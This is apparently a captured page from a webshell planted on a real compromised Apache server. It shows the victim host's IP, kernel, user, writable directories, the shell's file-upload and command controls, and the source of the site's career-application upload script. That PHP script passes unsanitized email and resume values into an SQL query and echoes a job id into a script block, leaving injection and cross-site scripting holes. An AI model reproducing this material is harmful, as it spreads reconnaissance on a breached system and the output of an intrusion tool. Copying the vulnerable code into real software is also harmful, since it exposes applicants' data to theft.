403Webshell
Server IP : 103.234.187.230  /  Your IP : 216.73.216.216
Web Server : Apache
System : Linux lserver42043-ind.megavelocity.net 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/rsdgroup/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/rsdgroup/writeCareer.php
<?php
include_once("conf/settings.php");
include_once("conf/func.php");

function uploadPhoto($fileName){
	$tmp_name = $_FILES[$fileName]["tmp_name"];
	$photoName = $_FILES[$fileName]["name"];
	$photoName = ereg_replace("[^A-Za-z0-9.]", "", $photoName);
	$photoNameArr = explode(".",$photoName);
	$fileExt = strtolower($photoNameArr[count($photoNameArr)-1]);
	unset($photoNameArr[count($photoNameArr)-1]);
	$photoNameWithoutExt = implode("_",$photoNameArr);
	$img1New = $fileName.(time()+$i).".".$fileExt;
	if($fileExt == "docx" || $fileExt == "doc" ){
		move_uploaded_file($tmp_name, "uploadedResumes/".$img1New.""); 
		return  $img =  $img1New ;
	}
	else{  
		$img =''; 
		return 0;
	}
}

$appResume = uploadPhoto('appResume');

if($appResume != ''){
	$sql	=	"INSERT INTO `tblCareer` 
				(`jobId`, `jobTitle`, `name`,`experience`,`specialization`, `address`, `city`, `phone`, `email`, `knowAbout`, `currentCompany`, `ctc`, `expectation`, `reference`, `noticePeriod`, `resume`, `createdOn`) 
				VALUES
				('".sanitize_data($jobId)."', '".sanitize_data($jobTitle)."', '".sanitize_data($appName)."','".sanitize_data($appExp)."','".sanitize_data($appSpec)."', '".sanitize_data($appAddress)."', '".sanitize_data($appCity)."', '".sanitize_data($appPhone)."', '".$appEmail."', '".sanitize_data($appHear)."', '".sanitize_data($appCurCompany)."', '".sanitize_data($appCTC)."', '".sanitize_data($appExpect)."', '".sanitize_data($appRef)."', '".sanitize_data($appJoin)."', '".$appResume."', unix_timestamp())";
				
	$result	=	mysql_query($sql) or die(mysql_error()); 
	
	
//change this to your email.
	//$to		=	"manish.ambast@rsdgroup.net";
	$to		    =	"career@rsdgroup.net";
	$from		=	"no-reply@rsdgroup.in";
	$subject	=	"Career Email - From Website";
//begin of HTML message
	$message = "
				<html>
					<body style='font-family:verdana;font-size:11px;color:#3f3f3f;'>
						<b>Dear Administrator,</b>
						<br>
						You have received an email in response to your current openings:
						<br><br>
						Job Id : ".sanitize_data($jobTitle)."<br>
						Name : ".sanitize_data($appName)."<br>
						City : ".sanitize_data($appCity)."<br>
						Email : ".$appEmail."<br>
						Phone : ".sanitize_data($appPhone)."<br>
						<br><br>
						To view the more details please login to your Admin account (<a href='http://www.rsdgroup.in/adminPanel/'>www.rsdgroup.in/admin</a>).
						<br><br>
						<b>Best Regards<br>
						RSD Group</b>
					</body>
				</html>";
//end of message
	$headers	=	"From: $from\r\n";
	$headers	.=	"Content-type: text/html\r\n";
//options to send to cc+bcc
//$headers .= "Cc: [email]maa@p-i-s.cXom[/email]";
//$headers .= "Bcc: [email]email@maaking.cXom[/email]";
// now lets send the email.
@mail($to, $subject, $message, $headers);
	
	
	?>
	<script>
		document.location="applynow.html?jobid=<?php echo $jobId; ?>&msg=suc";
	</script>
<?php }
else{ ?>
	<script>
		document.location="applynow.html?jobid=<?php echo $jobId; ?>&msg=err";
	</script>
<?php }
?>

Youez - 2016 - github.com/yon3zu
LinuXploit